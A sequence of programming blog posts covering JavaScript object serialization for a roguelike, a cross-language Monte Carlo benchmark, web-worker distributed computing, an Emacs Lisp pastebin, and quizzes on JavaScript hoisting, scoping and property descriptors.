This year I’m participating in the annual Seven Day Roguelike Challenge, where participants are attempting to create their own fully-playable roguelike within seven days. My entry is called Disc RL (play), a client-side browser roguelike.

Today’s issue was saving the game state in Local Storage. Otherwise the entire game would be lost if the tab was closed or the page left for any reason. This would limit the possible depth of my game, as any time investment could easily be lost. The issue is that Local Storage only stores strings, so the game state must be serialized and deserialized by my application.

You might say, “Use JSON!” The problem is that I’m using JavaScript’s object system, including polymorphism. The actual monsters are prototypes of the various types of monsters, which are themselves prototypes of the base monster prototype. Serializing a monster with JSON.stringify() loses all this “class” information, so the deserialized object will have no behavior.

function Foo() {}

Foo.prototype.greet = function() {
    return "hello";
};

var foo1 = new Foo();
foo1.greet();
// => "hello"

var foo2 = JSON.parse(JSON.stringify(foo1));
foo2.greet();
// => TypeError: Object has no method 'greet'

Specifically what’s not being captured here is the __proto__ property of the original object. When a property is not found on the current object, __proto__ is followed to check the next object in the prototype chain, all the way up to Object. The greet() method is found on the next item in the chain.

So the next suggestion might be, “Include __proto__ in the JSON string.” The main obstacle here is functions values cannot be serialized. More specifically, closures cannot be serialized. Closures capture their environment but there is no way to access this environment in order to serialize it. If the prototype has methods, which it likely does, it can’t be serialized.

Fortunately for my purposes I don’t actually need to serialize any objects with methods directly attached. I only need to ensure the __proto__ property points at the right prototype before I start using the object.

// Setting __proto__ directly:

foo2.__proto__ = Foo.prototype;
foo2.greet();
// => "hello"

// Or if your implementation doesn't support __proto__ (IE):

var foo3 = Object.create(Foo.prototype);
for (var p in foo2) {
    if (foo2.hasOwnProperty(p)) {
        foo3[p] = foo2[p];
    }
}
foo3.greet();
// => "hello"

Of course this one was really easy because there was only one prototype in my example. If we deserialize an arbitrary object how do we know which prototype to connect it to? We could attach this information to the object before serializing it. We can’t store the prototype itself because we’d run into the same problem as before. Instead, we want to attach the name of prototype. When the object is restored we can use the name to look up the appropriate prototype. Prototypes themselves don’t have names but constructors generally do.

foo.constructor.name;
// => "Foo"

I’m going to stuff this name in the "#" property of the object, a name that is unlikely to be used. A longer name has a better chance of avoiding a collision, but since I’m putting this in localStorage, and every stored object gets this field, I want to keep it short.

function serialize(object) {
    object['#'] = object.constructor.name;
    return JSON.stringify(object);
}

function deserialize(string) {
    var object = JSON.parse(string);
    object.__proto__ = window[object['#']].prototype;
    return object;
}

var string = serialize(new Foo());
// string === "{\"#\":\"Foo\"}"

deserialize(string).greet();
// => "hello"

To look up the prototype I check for a global variable of that name on the global object, which in this case is window. This places one important restriction on how I use my serializer: all constructors must have names and must be assigned to the corresponding global variable. Being a prototype language this isn’t necessarily the case!

(function() {
    var Bar = function Quux() {};
    var bar = new Bar();
    return bar.constructor.name;
}());
// => "Quux"

Here, the Bar/Quux prototype isn’t global nor does the attached name (Quux) match the name I used with new (Bar). If bar was serialized there would be no way to get a hold of its prototype.

So the two constraints so far are:

I need to consistently name my prototypes and store them in global variables.
I must never store a function in the property of any object I want to serialize.

Before I started on this today I was actually violating both of these rules. It took a small amount of refactoring to meet these conditions. Those people trying to be clever by using closures to hide private fields on their objects will ultimately get stuck on the second constraint.

To be useful, I need to recursively enter arrays and objects, attaching prototype information to any other objects I come across. This introduces one last constraint: no object can be reachable more than once from my root object. If an object appears more than once, it will be serialized twice and duplicated in the data structure when deserialized. Worse, if I make a circular reference my serialization function will never return.

To deal with this the serializer would need to keep track of what objects it has seen and, when an object is seen again, a reference is emitted instead. The deserializer, after reading in the entire structure, would need to replace these references with the right object. Fortunately for my roguelike no single object appears more than once in my core data structure, so I don’t need to worry about this.

After discussing all this with Gavin he did a search an found HydrateJS, a JavaScript library to do exactly all this, including the object reference stuff I didn’t need. Unfortunately this library turned out to be way too buggy for me to use. Objects returned by the parser are unable to be properly re-serialized again, so I couldn’t save, load, and save again.

I ended up writing my own functions to do what I needed: save.js. It’s not as capable as HydrateJS intends to be, but it does everything I need, and my entire game state can safely go back and forth between load and save arbitrarily many times. Most of the complexity comes from just figuring out exactly what type a particular thing is. This is frustratingly non-trivial in JavaScript.

It was really neat to see all this working so smoothly once I got it in place. When I started my roguelike I wasn’t sure if I could pull off load/restore properly. You can see this system in action right now at the play link at the top of the post. Play a little bit, close the tab, then visit the page again. It should restore your game (note: IE unsupported).

I might rip my serialization stuff out into its own library when I’m done. I bet I’ll find it useful again.

Fast Monte Carlo Method with JavaScript

2013-02-25T00:00:00Z

How many times should a random number from [0, 1] be drawn to have it sum over 1?

If you want to figure it out for yourself, stop reading now and come back when you’re done.

The answer is e. When I came across this question I took the lazy programmer route and, rather than work out the math, I estimated the answer using the Monte Carlo method. I used the language I always use for these scratchpad computations: Emacs Lisp. All I need to do is switch to the *scratch* buffer and start hacking. No external program needed.

The downside is that Elisp is incredibly slow. Fortunately, Elisp is so similar to Common Lisp that porting to it is almost trivial. My preferred Common Lisp implementation, SBCL, is very, very fast so it’s a huge speed upgrade with little cost, should I need it. As far as I know, SBCL is the fastest Common Lisp implementation.

Even though Elisp was fast enough to determine that the answer is probably e, I wanted to play around with it. This little test program doubles as a way to estimate the value of e, similar to estimating pi. The more trial runs I give it the more accurate my answer will get — to a point.

Here’s the Common Lisp version. (I love the loop macro, obviously.)

(defun trial ()
  (loop for count upfrom 1
     sum (random 1.0) into total
     until (> total 1)
     finally (return count)))

(defun monte-carlo (n)
  (loop repeat n
     sum (trial) into total
     finally (return (/ total 1.0 n))))

Using SBCL 1.0.57.0.debian on an Intel Core i7-2600 CPU, once everything’s warmed up this takes about 9.4 seconds with 100 million trials.

(time (monte-carlo 100000000))
Evaluation took:
  9.423 seconds of real time
  9.388587 seconds of total run time (9.380586 user, 0.008001 system)
  99.64% CPU
  31,965,834,356 processor cycles
  99,008 bytes consed
2.7185063

Since this makes for an interesting benchmark I gave it a whirl in JavaScript,

function trial() {
    var count = 0, sum = 0;
    while (sum <= 1) {
        sum += Math.random();
        count++;
    }
    return count;
}

function monteCarlo(n) {
    var total = 0;
    for (var i = 0; i < n; i++) {
        total += trial();
    }
    return total / n;
}

I ran this on Chromium 24.0.1312.68 Debian 7.0 (180326) which uses V8, currently the fastest JavaScript engine. With 100 million trials, this only took about 2.7 seconds!

monteCarlo(100000000); // ~2.7 seconds, according to Skewer
// => 2.71850356

Whoa! It beat SBCL! I was shocked. Let’s try using C as a baseline. Surely C will be the fastest.

#include 
#include 

int trial() {
    int count = 0;
    double sum = 0;
    while (sum <= 1.0) {
        sum += rand() / (double) RAND_MAX;
        count++;
    }
    return count;
}

double monteCarlo(int n) {
    int i, total = 0;
    for (i = 0; i < n; i++) {
        total += trial();
    }
    return total / (double) n;
}

int main() {
    printf("%f\n", monteCarlo(100000000));
    return 0;
}

I used the highest optimization setting on the compiler.

$ gcc -ansi -W -Wall -Wextra -O3 temp.c
$ time ./a.out
2.718359

real	0m3.782s
user	0m3.760s
sys	0m0.000s

Incredible! JavaScript was faster than C! That was completely unexpected.

The Circumstances

Both the Common Lisp and C code could probably be carefully tweaked to improve performance. In Common Lisp’s case I could attach type information and turn down safety. For C I could use more compiler flags to squeeze out a bit more performance. Then maybe they could beat JavaScript.

In contrast, as far as I can tell the JavaScript code is already as optimized as it can get. There just aren’t many knobs to tweak. Note that minifying the code will make no difference, especially since I’m not measuring the parsing time. Except for the functions themselves, the variables are all local, so they are never “looked up” at run-time. Their name length doesn’t matter. Remember, in JavaScript global variables are expensive, because they’re (generally) hash table lookups on the global object at run-time. For any decent compiler, local variables are basically precomputed memory offsets — very fast.

The function names themselves are global variables, but the V8 compiler appears to eliminate this cost (inlining?). Wrapping the entire thing in another function, turning the two original functions into local variables, makes no difference in performance.

While Common Lisp and C may be able to beat JavaScript if time is invested in optimizing them — something to be done rarely — in a casual implementation of this algorithm, JavaScript beats them both. I find this really exciting.

JavaScript "Map With This"

2013-02-07T00:00:00Z

JavaScript has a handy map() function for mapping a function across the elements of an array, producing a new array. It’s part of JavaScript’s functional side.

[1, 2, 3, 4, 5].map(function(x) { return x * x; });
// => [1, 4, 9, 16, 25]

Each array element is passed as the first argument to the function. (Unfortunately, it also passes two more arguments: the element’s index and the array itself, but I’m not using those here.) However, I sometimes find myself wishing there was a map-like function that used the element as the context of the function. Then I could apply a method to each of the elements in the array rather than be limited to functions.

It’s JavaScript so this could be added by adding a new map-like method on the Array prototype, but these sorts of extensions are bad practice. Fortunately, there’s a clean way to do this by building on the map() method. Here’s a function that produces an adaptor function, which translates the arguments of a provided function into a modified call to the provided function.

function withThis(f) {
    var args = Array.prototype.slice.call(arguments, 1);
    return function(object) {
        return f.apply(object, args);
    };
}

Here, withThis() takes a variadic function and some arguments, returning a new function that accepts one additional argument on the left and partially applies the provided function to the provided arguments. The first argument on the new function is used as the context of a call to the provided function. Here’s an example,

[1, 2, 3].map(withThis(Number.prototype.toFixed, 2));
// => ["1.00", "2.00", "3.00"]

The expression withThis(Number.prototype.toFixed, 2) returns a non-method version of toFixed(), partially applied to 2, which operates on its first argument rather than this. It’s well-suited to be passed to map() or filter().

One downside to this is that it’s not polymorphic; it doesn’t dispatch on the type of the element. This can be fixed,

function withThis(f) {
    var args = Array.prototype.slice.call(arguments, 1);
    return function(object) {
        return object[f].apply(object, args);
    };
}

[1, new Date(), [1, 2, 3]].map(withThis('toString'));
// => ["1", "Thu Feb 07 2013 17:08:46 GMT-0500 (EST)", "1,2,3"]

It’s also easier to call. Here’s the same toFixed() example.

[1, 2, 3].map(withThis('toFixed', 2));
// => ["1.00", "2.00", "3.00"]

I haven’t tested it yet, but I’d bet the second version of withThis() is a lot slower. It has to look up the actual method using the string at run time when, in the first version, the identifier is established at compile time. If this is the case, here’s a final version that does the right thing depending on what type of argument is provided.

function withThis(f) {
    var args = Array.prototype.slice.call(arguments, 1);
    if (typeof f === 'string') {
        return function(object) {
            return object[f].apply(object, args);
        };
    } else {
        return function(object) {
            return f.apply(object, args);
        };
    }
}

Web Distributed Computing Revisited

2013-01-26T00:00:00Z

Four years ago I investigated the idea of using browsers as nodes for distributed computing. I concluded that due to the platform’s constraints there were few problems that it was suited to solve. However, the situation has since changed quite a bit! In fact, this weekend I made practical use of web browsers across a number of geographically separated computers to solve a computational problem.

What changed?

Web workers came into existence, not just as a specification but as an implementation across all the major browsers. It allows for JavaScript to be run in an isolated, dedicated background thread. This eliminates the setTimeout() requirement from before, which not only caused a performance penalty but really hampered running any sort of lively interface alongside the computation. The interface and computation were competing for time on the same thread.

The worker isn’t entirely isolated; otherwise it would be useless for anything but wasting resources. As pubsub events, it can pass structured clones to and from the main thread running in the page. Other than this, it has no access to the DOM or other data on the page.

The interface is a bit unfriendly to live development, but it’s manageable. It’s invoked by passing the URL of a script to the constructor. This script is the code that runs in the dedicated thread.

var worker = new Worker('script/worker.js');

The sort of interface that would have been more convenient for live interaction would be something like what is found on most multi-threaded platforms: a thread constructor that accepts a function as an argument.

/* This doesn't work! */
var worker = new Worker(function() {
    // ...
});

I completely understand why this isn’t the case. The worker thread needs to be totally isolated and the above example is insufficient. I’m passing a closure to the constructor, which means I would be sharing bindings, and therefore data, with the worker thread. This interface could be faked using a data URI and taking advantage of the fact that most browsers return function source code from toString().

Another difficulty is libraries. Ignoring the stupid idea of passing code through the event API and evaling it, that single URL must contain *all* the source code the worker will use as one script. This means if you want to use any libraries you'll need to concatenate them with your script. That complicates things slightly, but I imagine many people will be minifying their worker JavaScript anyway.

Libraries can be loaded by the worker with the importScripts() function, so not everything needs to be packed into one script. Furthermore, workers can make HTTP requests with XMLHttpRequest, so that data don’t need to be embedded either. Note that it’s probably worth making these requests synchronously (third argument false), because blocking isn’t an issue in workers.

The other big change was the effect Google Chrome, especially its V8 JavaScript engine, had on the browser market. Browser JavaScript is probably about two orders of magnitude faster than it was when I wrote my previous post. It’s incredible what the V8 team has accomplished. If written carefully, V8 JavaScript performance can beat out most other languages.

Finally, I also now have much, much better knowledge of JavaScript than I did four years ago. I’m not fumbling around like I was before.

Applying these Changes

This weekend’s Daily Programmer challenge was to find a “key” — a permutation of the alphabet — that when applied to a small dictionary results in the maximum number of words with their letters in alphabetical order. That’s a keyspace of 26!, or 403,291,461,126,605,635,584,000,000.

When I’m developing, I use both a laptop and a desktop simultaneously, and I really wanted to put them both to work searching that huge space for good solutions. Initially I was going to accomplish this by writing my program in Clojure and running it on each machine. But what about involving my wife’s computer, too? I wasn’t going to bother her with setting up an environment to run my stuff. Writing it in JavaScript as a web application would be the way to go. To coordinate this work I’d use simple-httpd. And so it was born,

https://github.com/skeeto/key-collab

Here’s what it looks like in action. Each tab open consumes one CPU core, allowing users to control their commitment by choosing how many tabs to keep open. All of those numbers update about twice per second, so users can get a concrete idea of what’s going on. I think it’s fun to watch.

(I’m obviously a fan of blues and greens on my web pages. I don’t know why.)

I posted the server’s URL on reddit in the challenge thread, so various reddit users from around the world joined in on the computation.

Strict Mode

I had an accidental discovery with strict mode and Chrome. I’ve always figured using strict mode had an effect on the performance of code, but had no idea how much. From the beginning, I had intended to use it in my worker script. Being isolated already, there are absolutely no downsides.

However, while I was developing and experimenting I accidentally turned it off and left it off. It was left turned off for a short time in the version I distributed to the clients, so I got to see how things were going without it. When I noticed the mistake and uncommented the "use strict" line, I saw a 6-fold speed boost in Chrome. Wow! Just making those few promises to Chrome allowed it to make some massive performance optimizations.

With Chrome moving at full speed, it was able to inspect 560 keys per second on Brian’s laptop. I was getting about 300 keys per second on my own (less-capable) computers. I haven’t been able to get anything close to these speeds in any other language/platform (but I didn’t try in C yet).

Furthermore, I got a noticeable speed boost in Chrome by using proper object oriented programming, versus a loose collection of functions and ad-hoc structures. I think it’s because it made me construct my data structures consistently, allowing V8’s hidden classes to work their magic. It also probably helped the compiler predict type information. I’ll need to investigate this further.

Use strict mode whenever possible, folks!

What made this problem work?

Having web workers available was a big help. However, this problem met the original constraints fairly well.

It was low bandwidth. No special per-client instructions were required. The client only needed to report back a 26-character string.
There was no state to worry about. The original version of my script tried keys at random. The later version used a hill-climbing algorithm, so there was some state but it was only needed for a few seconds at a time. It wasn’t worth holding onto.

This project was a lot of fun so I hope I get another opportunity to do it again in the future, hopefully with a lot more nodes participating.

Flu Trends Timeline

2013-01-13T00:00:00Z

This past week I came across this CSV-formatted data from Google. It’s search engine trends for searches about the flu for different parts of the US.

http://www.google.org/flutrends/us/data.txt

I thought it would be interesting to display this data on a map with a slider along the bottom to select the date. Here’s the result of spending two hours doing just that. I’m really happy with how it turned out, and, further, I picked up a few new tricks from the process.

Flu Trends Timeline (GitHub)

You probably noticed there was a spinner when you first opened the page. This is because it’s asynchronously fetching the latest data.txt from Google. However, since it’s a cross-origin request, and I don’t control the server headers (static hosting), it’s using AnyOrigin.com to translate it into a JSONP request. That’s a really handy service!

To parse the CSV format, I’m using jquery-csv. I wouldn’t mention it except that it has a really cool feature I haven’t seen in any other CSV parser: instead of reading the text into a two-dimensional array — which would need to be “parsed” further — it can read in each row as a object, using the CSV header line as the properties. This is the toObjects() function. It makes it feel like reading straightforward JSON. For example,

name,color,weight
apple,red,1.2
banana,yellow,1.6
orange,orange,0.9

Will be parsed into this in JavaScript structure,

[{name:"apple",  color:"red",    weight:"1.2"},
 {name:"banana", color:"yellow", weight:"1.6"},
 {name:"orange", color:"orange", weight:"0.9"}]

With the flu data, it means each returned object is a single date snapshot, just what I need. The only data-massaging I had to do was mapping over each object to convert the date string into a proper Date object.

Using two neat tricks I’ve got the latest data parsed into my desired data structure. Next up is displaying a map. At first I wasn’t sure how I to do this cleanly but then I remembered an old DailyProgrammer problem: #89, Coloring the United States of America. SVG maps tend to contain metadata describing what shape is what. In this case, each state shape’s id attribute has the two-letter state code. Even more, SVG plays very, very well with JavaScript. It can be manipulated as part of the DOM, using the same API, including jQuery. It also uses CSS for styling.

The tricky part is actually accessing the SVG’s document root. To do this, it can’t be included as an img tag. Otherwise it’s an opaque raster image as far as JavaScript is concerned. It either needs to be embedded into the HTML — a dirty mix of languages that should be avoided — or accessed through an asynchronous request. Accessing remote XML was the original purpose of asynchronous browser requests, after all (i.e. the poorly-named XMLHttpRequest object). I can host this SVG from my own server, so this isn’t an issue like the CSV data.

HTML doesn’t have a slider input, unfortunately, so for the slider I’m using the jQuery UI Slider. I’m not terribly impressed with it but it gets the job done. Even before I had the slider connected, I could change the display date on the fly from Emacs using Skewer.

In regard my initial expectations, this project was surprisingly very well suited for HTML and JavaScript. Being able to manipulate SVG on the fly is really powerful and I doubt there’s an easier platform on which to do it than the browser.

An Emacs Pastebin

2012-12-29T00:00:00Z

Luke is doing an interesting ~~three~~five-part tutorial on writing a pastebin in PHP: PHP Like a Pro (2, 3, 4, 5). The tutorial is largely an introduction to the set of tools a professional would use to accomplish a more involved project, the most interesting of which, for me, is Vagrant.

Because I have no intention of ever using PHP, I decided to follow along in parallel with my own version. I used Emacs Lisp with my simple-httpd package for the server. I really like my servlet API so was a lot more fun than I expected it to be! Here’s the source code,

https://github.com/skeeto/emacs-pastebin

Here’s what it looked like once I was all done,

It has syntax highlighting, paste expiration, and light version control. The server side is as simple as possible, consisting of only three servlets,

/pastebin/: static files
/pastebin/get: serves (immutable) pastes in JSON
/pastebin/post: accepts new pastes in JSON, returns the ID

A paste’s JSON is the raw paste content plus some metadata, including post date, expiration date, language (highlighting), parent paste ID, and title. That’s it! The server is just a database and static file host. It performs no dynamic page generation. Instead, the client-side JavaScript does all the work.

For you non-Emacs users, the repository has a pastebin-standalone.el which can be used to launch a standalone instance of the pastebin server, so long as you have Emacs on your computer. It will fetch any needed dependencies automatically. See the header comment of this file for instructions.

IDs

A paste ID is four or more randomly-generated numbers, letters, dashes or underscores, with some minor restrictions (pastebin-id-valid-p). It’s appended to the end of the servlet URL.

/pastebin/
/pastebin/get/

In the first case, the servlet entirely ignores the ID. Its job is only to serve static files. In the second case the server looks up the ID in the database and returns the paste JSON.

The client-side inspects the page’s URL to determine the ID currently being viewed, if any. It performs an asynchronous request to /pastebin/get/ to fetch the paste and insert the result, if found, into the current page.

Form submission isn’t done the normal way. Instead, the submission is intercepted by an event handler, which wraps the form data up in JSON (much cleaner to parse!) and sends it asynchronously to /pastebin/post via POST. This servlet inserts the paste in the database and responds in text/plain with the paste ID it generated. The client-side then redirects the browser to the paste URL for that paste.

Features

As I said, the server performs no page generation, so syntax highlighting is done in the client with highlight.js. I could have used htmlize and supported any language that Emacs supports. However, I wanted to keep the server as simple as possible, and, more importantly, I really don’t trust Emacs’ various modes to be secure in operating on arbitrary data. That’s a huge attack surface and these modes were written without security in mind (fairly reasonable). It’s actually a deliberate feature for Emacs to automatically eval Elisp in comments under certain circumstances.

Version control is accomplished by keeping track of which paste was the parent of the paste being posted. When viewing a paste, the content is also placed in a textarea for editing. Submitting this form will create a new paste with the current paste as the parent. When viewing a paste that has a parent, a “diff” option is provided to view a diff patch of the current paste with its parent (see the screenshot above). Again, the server is dead simple, so this patch is computed by JavaScript after fetching the parent paste from the server.

Databases

As part of my fun I made a generic database API for the servlets, then implemented three different database backends. I used eieio, Emacs Lisp’s CLOS-like object system, to implement this API. Creating a new database backend is just a matter of making a new class that implements two specific methods.

The first, and default, implementation uses an Elisp hash table for storage, which is lost when Emacs exits.

The second is a flat-file database. I estimate it should be able to support at least 16 million different pastes gracefully. The on-disk format for pastes is an s-expression. Basically, this is read by Emacs, expiration date checked, converted to JSON, then served to the client.

To my great surprise there is practically no support for programmatic access to a SQL database from GNU Emacs Lisp (other Emacsen do). The closest I found was pg.el, which is asynchronous by necessity. However, the specific target I had in mind was SQLite.

I did manage to implement a third backend that uses SQLite, but it’s a big hack. It invokes the sqlite3 command line program once for every request, asking for a response in CSV — the only output format that seems to escape unambiguously. This response then has to be parsed, so long as it’s not too long to blow the regex stack.

Update February 2014: I have found a solution to this problem!

Future

This has been an educational project for me. As a tutorial and for practice I’ll probably write the server again from scratch using other languages and platforms (Node.js and Hunchentoot maybe?), keeping the same front-end.

JavaScript Truthiness Quiz

2012-11-28T00:00:00Z

I’ve got another quirky JavaScript quiz for you. This one has two different answers.

function foo(object) {
    object.bar = false;
    return object.bar && true;
}

foo(___); // Fill in an argument such that foo() returns true.

Obviously a normal object won’t do the job. Something more special is needed.

foo({bar: true});  // => false

The fact that foo() can return true could introduce a bug during refactoring: the code initially appears to be a tautology that could be reduced to a simpler return false. Since this quiz has solutions that’s obviously not true.

Had I reversed the booleans — assign bar to true and make this function return a falsy value — then almost any immutable object, such as a string, would do.

function foo2(object) {
    object.bar = true;  // inverse
    return object.bar && true;
}

foo2("baz");  // => undefined

The bar assignment would fail and attempting to access it would return undefined, which is falsy.

Answer

The two approaches are getters and property descriptors.

Getters

JavaScript directly supports getter and setter properties. Without special language support, such accessors could be accomplished with plain methods (like Java).

var lovesBlue = {
    _color: "blue",  // private

    getColor: function() {
        return this._color;
    },

    /* Only blue colors are allowed! */
    setColor: function(color) {
        if (/blue/.test(color)) {
            this._color = color;
        }
        return this._color;
    }
};

lovesBlue.getColor();              // => "blue"
lovesBlue.setColor("red");         // => "blue" (set fails)
lovesBlue.setColor("light blue");  // => "light blue"

JavaScript allows properties themselves to transparently run methods, such as to enforce invariants, even though it’s not an obvious call site. This is how many of the browser environment objects work. There’s a special syntax with get and set keywords. (Keep this mind, JSON parser writers!)

var lovesBlue = {
    _color: "blue",

    get color() {
        return this._color;
    },

    set color(color) {
        if (/blue/.test(color)) {
            this._color = color;
        }
    }
};

lovesBlue.color = "red";  // => "red", but assignment fails
lovesBlue.color;          // => "blue"

This can be used to solve the quiz,

foo({get bar() { return true; }});

Because bar is a getter with no associated setter, there’s effectively no assigning values to bar and it always evaluates to true.

Property descriptors

Object properties themselves have properties, called descriptors, governing their behavior. The accessors above are examples of the descriptors get and set. For our situation there’s a writable descriptor which determines whether or not a particular property can be assigned. If you really wanted to lock this in, there’s even a metadescriptor (a metametaproperty?), configurable, that determines whether or not a property’s descriptors, including itself, can be modified.

There’s no literal syntax for them, but these descriptors can be set with Object.defineProperty(). Conveniently, this function returns the object being modified.

foo(Object.defineProperty({}, 'bar', {value: true, writable: false}));

This creates a new object, sets bar to true, and locks that in by making the property read-only.

The fact that attempting to assign a read-only property silently fails instead of throwing an exception is probably another mistake in the language’s design. While this behavior newbie-friendly, it allows bugs to slip by undetected, only to be found much later when they’re more expensive to address. It makes JavaScript programs more brittle.

Existing objects: a third approach?

If you’re lazy and in a browser environment, you don’t even need to construct new objects to solve the problem. There are some already lying around! My favorite is HTML5’s localStorage. It stringifies all property assignments. This means that false becomes "false", which is truthy.

foo(localStorage);  // => true

This is arguably a third approach because the stringification behavior can’t be accomplished with either normal accessors or descriptors alone.

Raising the Dead with JavaScript

2012-11-20T00:00:00Z

After my last post, Gavin sent me this: Scope Cheatsheet. Besides its misleading wording, an interesting fact stood out and gave me another JavaScript challenge question. I’ll also show you how it allows JavaScript to raise the dead!

Background

Like its close cousin, Scheme, JavaScript is a Lisp-1: functions and variables share the same namespace. In Scheme, the define form defines new variables.

(define foo "Hello, world!")

Combine with the lambda form and it can be used to name functions,

(define square (lambda (x) (* x x)))

(square -4)  ;; => 16

The variable square is assigned to an anonymous function, and afterward it can be called as a function. Since this is so common, there’s a syntactic shorthand (sugar) for this,

(define (square x) (* x x))

Notice that the first argument to define is now a list rather than a symbol. This is a signal to define that a function is being defined, and that this should be expanded into the lambda example above. (Also note that the declaration mimics a function call, which is pretty neat.)

JavaScript also has syntactic sugar for the same purpose. The var statement establishes a binding in the current scope. This can be used to define both variables and functions, since they share a namespace. For convenience, in addition to defining an anonymous function, the function statement can be used to declare a variable and assign it a function. These definitions below are equivalent … most of the time.

var square = function(x) {
    return x * x;
}

function square(x) {
    return x * x;
}

The second definition is actually more magical than a syntactic shorthand, which leads into my quiz.

Quiz

function bar() {
    var foo = 0;
    function foo() {}
    return typeof foo;
}

bar(); // What does this return? Why?

function baz() {
    var foo;
    function foo() {}
    return typeof foo;
}

baz(); // How about now?

function quux() {
    var foo = 0;
    var foo = function () {}
    return typeof foo;
}

quux(); // How about now?

We have three functions, bar(), baz(), and quux(), each slightly different. Try to figure out the return value of each without running them in a JavaScript interpreter. Reading the cheatsheet should give you a good idea of the answer.

Answer

Figured it out? The first function, bar(), is the surprising one. If the special function form was merely syntactic sugar then all this means is that foo is redundantly declared (and re-assigned before accessing it, which the compiler could optimize). The final assignment is a function, so it should return 'function'.

However, this is not the case! This function returns 'number'. The first assignment listed in the code actually happens after the second assignment, the function definition. This is because functions defined using the special syntax are hoisted to the top of the function. The function assignments are evaluated before any other part of the function body. This is the extra magic behind the special function syntax.

The effect is more apparent when looking at the return value of quux(), which is 'function'. The special function syntax isn’t used so the assignments are performed in the order that they’re listed. This isn’t surprising, except for the fact that variables can be declared multiple times in a scope without any sort of warning.

The second function, baz(), returns 'function'. The function definition is still hoisted but the variable declaration performs no assignment. The function assignment is not overridden. Because of the lack of assignment, nothing actually happens at all for the variable declaration.

Now, this seems to be a cloudy concept for even skilled programmers: a variable declaration like var foo = 0 accomplishes two separate things. The merge of these two tasks into a single statement is merely one of convenience.

Declaration: declares a variable, modifying the semantics of the function’s body. It changes what place in memory an identifier in the current scope will refer to. This is a compile-time activity. Nothing happens at run time — there is no when. When function definitions are hoisted, it’s the assignment (part 2) that gets hoisted. In C, variables are initially assigned to stack garbage (globals are zeroed). In JavaScript, variables are initially assigned to undefined.
Assignment: binds a variable to a new value. This is evaluated at run time. It matters when this happens in relation to other evaluations.

Consider this,

var foo = foo;

The expression on the right-hand side is evaluated in the same scope as the variable declaration. foo is initially assigned to undefined, then it is re-assigned to undefined. This permits recursive functions to be defined with var — otherwise the identifier used to make the recursive call wouldn’t refer to the function itself.

var factorial = function(n) {
    if (n === 0)
        return 1;
    else
        return factorial(n - 1) * n;
};

In contrast, Lisp’s let does not evaluate the right-hand side within the scope of the let, so recursive definitions are not possible with a regular let. This is the purpose of letrec (Scheme) and labels (Common Lisp).

;; Compile error, x is unbound
(let ((x x))
  x)

Why function hoisting?

JavaScript’s original goal was to be easy for novices to program. I think that they wanted users to be able to define functions anywhere in a function (at the top level) without thinking about it. Novices generally don’t think of functions as values, so this is probably more intuitive for them. To accomplish this, the assignment needs to happen before the real body of the function. Unfortunately, this leads to surprising behavior, and, ultimately, it was probably a bad design choice.

Below, in any other language the function definition would be dead code, unreachable by any valid control flow, and the compiler would be free to toss it.

function foo() {
    return baz();
    function baz() { return 'Hello'; }
}

foo(); // => 'Hello'

But in JavaScript you can raise the dead!

JavaScript Debugging Challenge

2012-11-19T00:00:00Z

As I’ve been exploring JavaScript I’ve come up with a few interesting questions that expose some of JavaScript’s quirks. This is the first one, which I came up with over the weekend. Study it and try to come up with an answer before looking a the explanation below. Go ahead and use a JavaScript interpreter or debugger to poke at it if you need to.

var count = 4;

function foo() {
    var table = [count];

    /* Build the table. */
    while (count-- > 0) {
        table.push([]);
    }

    /* Fill it with numbers. */
    for (var count = 1; count < table.length; count++) {
        table[count].push(count);
    }
    return table;
}

foo(); // What does this return? And why?

When I originally came up with the problem, I just enabled impatient-mode in my editor buffer to share it friends. It’s a really convenient alternative to pastebins!

Answer

If you’ve gotten this far either you figured it out or you gave up (hopefully not right away!). Without careful attention, the expected output would be [4, [1], [2], [3], [4]]. Create an array containing count, push on count arrays, and finally iterate over the whole thing. Seems simple.

However, the actual return value is [undefined], which at first may seem to defy logic. There’s a bit of a double-trick to this question due to the way I wrote it.

The first trick is that this might appear to be a quirk in the Array push() method. If you pass an array to push() does it actually concatenate the array, flattening out the result? If it did, pushing an empty array would result in nothing. This is not the case, fortunately.

var foo = [1, 2, 3];
foo.push([]);  // foo = [1, 2, 3, []]

The real quirk here is JavaScript’s strange scoping rules. JavaScript only has function scope ¹, not block scope like most other languages. A loop, including for, doesn’t get its own scope so the looping variables are actually hoisted into the function scope. For the first two uses of count, it isn’t actually a free variable like it appears to be. It refers to the for loop variable count even though it’s declared later in the function.

A variable doesn’t spring into existence at the place it’s declared — otherwise that would be a sort-of hidden nested scope. The binding’s extent is determined at compile-time (i.e. lexical scope). If the variable is declared anywhere in the function with var, it is bound for the entire body of the function. In contrast, C requires that variables be declared before they are used. This isn’t strictly necessary from the compiler’s point of view, but it keeps humans from making mistakes like above. A C variable “exists” (barring optimizations, it’s been allocated space on the stack) for the entire block it’s declared in, but since it can’t be referenced before the declaration that detail has no visible effect.

In the code above, because count was not assigned any value at the beginning of the function, it is initially bound to undefined, which is coerced into 0 when used as a number. The result is that the array is initially filled with undefined, then zero arrays are pushed onto it. In the final loop, the array doesn’t have any elements to loop over so nothing happens and [undefined] is returned.

yet.

JavaScript 1.7 actually has block scope when using let, but let is not widely supported ↩

JavaScript Strings as Arrays

2012-11-15T00:00:00Z

Lisp

One thing I enjoy about Common Lisp is its general treatment of sequences. (In fact, I wish it went further with it!) Functions that don’t depend on list-specific features generally work with any kind of sequence. For example, remove-duplicates doesn’t just work with lists, it works on any sequence.

(remove-duplicates '(a b b c))  ; list
=> (A B C)

(remove-duplicates #(a b b c))  ; array
=> #(A B C)

Functions like member and mapcar require lists because their behavior explicitly uses them. The general sequence version of these are find and map. Writing a new sequence function means sticking to these generic sequence functions, particularly elt and subseq rather than the more specialized accessors.

A string is just a one-dimensional array — a vector — with elements of the type character. This means all sequence functions also work on strings.

(make-array 10 :element-type 'character :initial-element #\a)
=> "aaaaaaaaaa"

(remove-duplicates "abbc")
=> "abc"

(map 'string #'char-upcase "foo")
=> "FOO"

(reverse "foo")
=> "oof"

There is no special set of functions just for operating on strings (except those for string-specific operations). Strings are as powerful and flexible as any other sequence. This is very convenient.

JavaScript

Unfortunately, JavaScript strings aren’t quite arrays. They look and act a little bit like arrays, but they’re missing a few of the useful methods.

var foo = "abcdef";

foo[1]
=> "b"

foo.length
=> 6

foo.reverse()  // error, no method 'reverse'

